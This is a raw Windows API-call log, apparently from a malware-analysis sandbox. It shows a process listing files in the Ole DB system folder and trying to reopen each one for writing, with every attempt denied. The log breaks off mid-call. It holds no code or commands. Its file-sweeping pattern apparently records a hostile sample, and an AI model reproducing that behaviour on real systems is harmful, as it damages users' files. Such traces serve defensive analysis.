[0088.964] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB\\msxactps.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\Ole DB\\msxactps.dll", lpUsedDefaultChar=0x0) returned 57 [0088.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0088.964] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.964] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0088.964] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0088.964] AreFileApisANSI () returned 1 [0088.965] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0088.965] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69e30 [0088.965] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x69e30, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB\\msxactps.dll") returned 57 [0088.965] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\msxactps.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\msxactps.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0088.970] GetFileType (hFile=0x360) returned 0x1 [0088.970] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69e30 | out: hHeap=0x20000) returned 1 [0088.970] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0088.970] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0088.970] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0088.971] CloseHandle (hObject=0x360) returned 1 [0088.971] AreFileApisANSI () returned 1 [0088.971] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0088.971] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69bb0 [0088.971] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x69bb0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB\\msxactps.dll") returned 57 [0088.971] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\msxactps.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\msxactps.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.971] GetLastError () returned 0x5 [0088.971] GetLastError () returned 0x5 [0088.971] SetLastError (dwErrCode=0x5) [0088.971] GetLastError () returned 0x5 [0088.971] SetLastError (dwErrCode=0x5) [0088.971] GetLastError () returned 0x5 [0088.971] SetLastError (dwErrCode=0x5) [0088.971] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0088.971] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0088.971] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0088.971] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0088.971] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.971] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.971] FindNextFileW (in: hFindFile=0x78250, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41ce9283, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x41ce9283, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x41ce9283, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xe6000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="oledb32.dll", cAlternateFileName="")) returned 1 [0088.971] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0088.971] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.971] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0088.971] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0088.971] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0088.971] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0088.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0088.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0088.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351d0 [0088.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0088.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351d0 | out: hHeap=0x20000) returned 1 [0088.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0088.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0088.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0088.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0088.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0088.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0088.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0088.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a5c8 [0088.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0088.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0088.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0088.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0088.972] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.972] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.972] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.972] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0088.972] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0088.972] AreFileApisANSI () returned 1 [0088.972] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB\\oledb32.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\Ole DB\\oledb32.dll", lpUsedDefaultChar=0x0) returned 56 [0088.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0088.972] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.972] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0088.972] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0088.973] AreFileApisANSI () returned 1 [0088.973] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0088.973] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0088.973] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x75fa8, cchWideChar=56 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB\\oledb32.dll") returned 56 [0088.973] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\oledb32.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\oledb32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0088.974] GetFileType (hFile=0x360) returned 0x1 [0088.974] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0088.974] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0088.974] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0088.974] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0088.974] CloseHandle (hObject=0x360) returned 1 [0088.974] AreFileApisANSI () returned 1 [0088.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0088.974] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0088.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x76020, cchWideChar=56 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB\\oledb32.dll") returned 56 [0088.975] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\oledb32.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\oledb32.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.975] GetLastError () returned 0x5 [0088.975] GetLastError () returned 0x5 [0088.975] SetLastError (dwErrCode=0x5) [0088.975] GetLastError () returned 0x5 [0088.975] SetLastError (dwErrCode=0x5) [0088.975] GetLastError () returned 0x5 [0088.975] SetLastError (dwErrCode=0x5) [0088.975] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0088.975] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0088.975] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0088.975] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0088.975] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.975] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.975] FindNextFileW (in: hFindFile=0x78250, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41ce9283, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x41ce9283, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x41ce9283, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x13000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="oledb32r.dll", cAlternateFileName="")) returned 1 [0088.975] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.975] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0088.975] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0088.975] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0088.975] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0088.975] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0088.975] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.975] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0088.975] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0088.975] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0088.975] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0088.975] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0088.975] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0088.975] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0088.975] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0088.975] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0088.975] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.975] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71c38 [0088.976] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0088.976] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a368 [0088.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71c38 | out: hHeap=0x20000) returned 1 [0088.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0088.976] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e470 [0088.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0088.976] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.976] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.976] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.976] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e470 | out: hHeap=0x20000) returned 1 [0088.976] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.976] AreFileApisANSI () returned 1 [0088.976] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB\\oledb32r.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\Ole DB\\oledb32r.dll", lpUsedDefaultChar=0x0) returned 57 [0088.976] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0088.976] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.976] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.976] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0088.976] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0088.976] AreFileApisANSI () returned 1 [0088.976] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0088.976] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69bb0 [0088.976] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x69bb0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB\\oledb32r.dll") returned 57 [0088.976] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\oledb32r.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\oledb32r.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0088.977] GetFileType (hFile=0x360) returned 0x1 [0088.977] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0088.977] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0088.977] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0088.977] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0088.977] CloseHandle (hObject=0x360) returned 1 [0088.978] AreFileApisANSI () returned 1 [0088.978] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0088.978] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69bb0 [0088.978] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x69bb0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB\\oledb32r.dll") returned 57 [0088.978] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\Ole DB\\oledb32r.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\oledb32r.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.978] GetLastError () returned 0x5 [0088.978] GetLastError () returned 0x5 [0088.978] SetLastError (dwErrCode=0x5) [0088.978] GetLastError () returned 0x5 [0088.978] SetLastError (dwErrCode=0x5) [0088.978] GetLastError () returned 0x5 [0088.978] SetLastError (dwErrCode=0x5) [0088.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0088.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0088.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0088.978] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0088.978] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.978] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.978] FindNextFileW (in: hFindFile=0x78250, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41ce9283, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x41ce9283, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x41ce9283, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x264c, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="oledbjvs.inc", cAlternateFileName="")) returned 1 [0088.978] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.979] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0088.979] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0088.979] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0088.979] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0088.979] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0088.979] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.979] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0088.979] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0088.979] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35190 [0088.979] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0088.979] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35190 | out: hHeap=0x20000) returned 1 [0088.979] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0088.979] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35270 [0088.979] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0088.979] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35270 | out: hHeap=0x20000) returned 1 [0088.979] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.979] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0088.979] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0088.979] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8ae18 [0088.979] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0088.979] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0088.979] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0088.979] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ae18 | out: hHeap=0x20000) returned 1 [0088.979] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.979] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.979] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.979] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.979] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0088.980] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.980] AreFileApisANSI () returned 1 [0088.980] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\Ole DB\\oledbjvs.inc", lpUsedDefaultChar=0x0) returned 57 [0088.980] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0088.980] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.980] InitOnceExecuteOnce (in: 